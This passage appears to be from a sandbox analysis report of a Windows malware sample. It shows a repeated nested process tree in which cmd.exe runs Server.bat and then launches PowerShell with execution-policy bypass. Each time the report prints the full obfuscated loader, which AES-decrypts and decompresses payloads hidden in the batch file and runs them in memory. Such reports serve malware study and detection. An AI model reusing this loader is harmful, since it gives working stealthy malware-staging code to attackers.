'')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        61⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2028
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        59⤵
        
        PID:1384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        60⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1480
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        58⤵
        
        PID:3012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        59⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2824
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        57⤵
        
        PID:1636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        58⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        56⤵
        
        PID:3004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        57⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2564
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        55⤵
        
        PID:2988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        56⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1612
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        54⤵
        
        PID:1172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        55⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        53⤵
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        54⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:864
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        52⤵
        
        PID:792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        53⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:340
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        51⤵
        
        PID:992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        52⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2796
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        50⤵
        
        PID:1012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        51⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1020
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        49⤵
        
        PID:2728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        50⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1768
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        48⤵
        
        PID:1628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
